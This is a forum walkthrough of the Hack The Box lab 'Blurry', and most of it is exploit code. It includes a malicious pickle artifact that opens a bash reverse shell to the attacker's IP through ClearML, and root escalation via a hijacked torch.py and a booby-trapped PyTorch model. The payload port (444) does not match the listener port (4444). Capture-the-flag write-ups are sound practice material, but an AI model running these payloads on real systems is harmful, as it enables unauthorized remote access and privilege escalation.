Hackthebox - Blurry

macavitysworld · September 29, 2024, 5:33pm

0x1 Initial Reconnaissance

Nmap Results:

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0

0x2 Subdomain Enumeration

ffuf -u "http://IP" -H "Host: FUZZ.blurry.htb" -w /path/to/wordlist -fs 169

Found Subdomains:

app.blurry.htb
files.blurry.htb
chat.blurry.htb

0x3 Exploiting ClearML

Registering on ClearML:

pip install clearml
clearml-init

Update clearml.conf with:

api {
  web_server: http://app.blurry.htb
  api_server: http://app.blurry.htb/api
  files_server: http://files.blurry.htb
  credentials {
    "access_key" = "KEY"
    "secret_key" = "SECRET"
  }
}

Uploading a Malicious Artifact:

import pickle, os

class RunCommand:
    def __reduce__(self):
        return (os.system, ('/bin/bash -c "/bin/bash -i >& /dev/tcp/IP/444 0>&1"',))

command = RunCommand()

from clearml import Task
task = Task.init(project_name='Black Swan', task_name='pickle_artifact_upload', tags=["review"])
task.upload_artifact(name='pickle_artifact', artifact_object=command, retries=2, wait_on_upload=True, extension_name=".pkl")

Set up a listener on your machine:

nc -lvnp 4444

0x4 Privilege Escalation

Sudo Permissions:

(root) NOPASSWD: /usr/bin/evaluate_model /models/*.pth

Hijacking Python Libraries:

echo 'import os; os.system("bash")' > /models/torch.py
sudo /usr/bin/evaluate_model /models/demo_model.pth

Replace evaluate_model.py:

jippity@blurry:/models$ rm evaluate_model.py 
rm: remove write-protected regular file 'evaluate_model.py'? y
jippity@blurry:/models$ echo 'import os; os.system("bash")' > evaluate_model.py
jippity@blurry:/models$ sudo /usr/bin/evaluate_model /models/demo_model.pth

Custom malicious model:

import torch
import torch.nn as nn
import os

class CustomModel(nn.Module):
    def __init__(self):
        super(CustomModel, self).__init__()
        self.linear = nn.Linear(10, 1)

    def forward(self, hi):
        return self.linear(hi)

    def __reduce__(self):
        cmd = "bash"
        return os.system, (cmd,)

model = CustomModel()
torch.save(model, '/models/root.pth')

Run the model evaluation:

sudo /usr/bin/evaluate_model /models/root.pth